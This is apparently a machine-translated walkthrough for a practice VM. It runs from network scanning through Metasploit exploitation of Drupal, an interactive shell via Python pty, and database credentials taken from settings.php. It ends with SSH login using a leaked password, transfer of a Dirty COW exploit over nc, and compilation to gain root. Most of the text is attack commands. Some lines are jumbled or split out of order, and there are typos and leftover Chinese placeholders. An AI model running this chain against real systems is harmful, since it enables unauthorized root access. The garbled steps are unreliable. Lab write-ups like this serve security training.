introduce
Vulnerability number CVE-2016-5195
Vulnerability name : Dirty cow privilege escalation
Vulnerability hazard : Low-privileged users can use this vulnerability technology to achieve local privilege escalation on all versions of Linux systems and obtain root privileges.
Scope of impact : Linux kernel >=2.6.22 (released in 2007) has been affected since then and was not repaired until October 18, 2016
Link: Shooting range download address, extraction code
Link: Privilege escalation file download address, privilege escalation code zp3j
collect message
ifconfig Check the local IP address.
nmap -sP 192.168.152.0/24 Scan the network segment and check the shooting range address.
nmap -A 192.168.152.129 -p 0-65535Scan the port
and open the network address http://[ip]:1898. If this page appears, it means the shooting range is opened successfully.
dirb 网站地址 To scan the directory
, we use robots.txt to see if there are exploitable vulnerabilities. Check
The website contains drupal version information. We use msfconsole to check whether there are exploitable vulnerabilities.
Vulnerability recurrence
Msfconsole#Search for exploitable vulnerabilities
search drupal #Query vulnerabilities
use 1 #View vulnerabilities with serial number 1
show options#View content that needs to be set 
#Use set to set
set RHOSTS 靶场地址
set RPSOST 靶场端口
run #Run and discover vulnerabilities
shell#Interact
python -c 'import pty; pty.spawn("/bin/bash")' #Use Python for interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
cat settings.php#View the contents
and get the account number and password
cd /home of the database #Enter the /home directory and view existing accounts
SSH connection account tiago password Virgulino port 22 The connection is successful.
idView the current user information
uname -a. View the kernel version of the target machine.
Dirty Cow Power Elevation
Script link: Download address of privilege escalation file, privilege escalation code zp3j
kali tar -czvf aa.tar.gz CVE-2016-5195-master #Compress the file.
The compressed name is aa.tar.gz, which needs to be passed to the target machine to perform privilege escalation. The target
machine : listens to aa on port 4444. The tar.gz file
nc -l 4444 > aa.tar.gz
kali transfers the aa.tar.gz file to
nc 192.168.152.129 4444 < aa.tar.gz
the target machine and decompresses the transferred aa.tar.gz tar -xzvf aa.tar.gz#Enter
CVE-2016-5195-master
cd CVE-2016-5195-master
make#New content appears dcow
./dcow
root password is dirtyCowFun
su entered and the privilege escalation is successful.
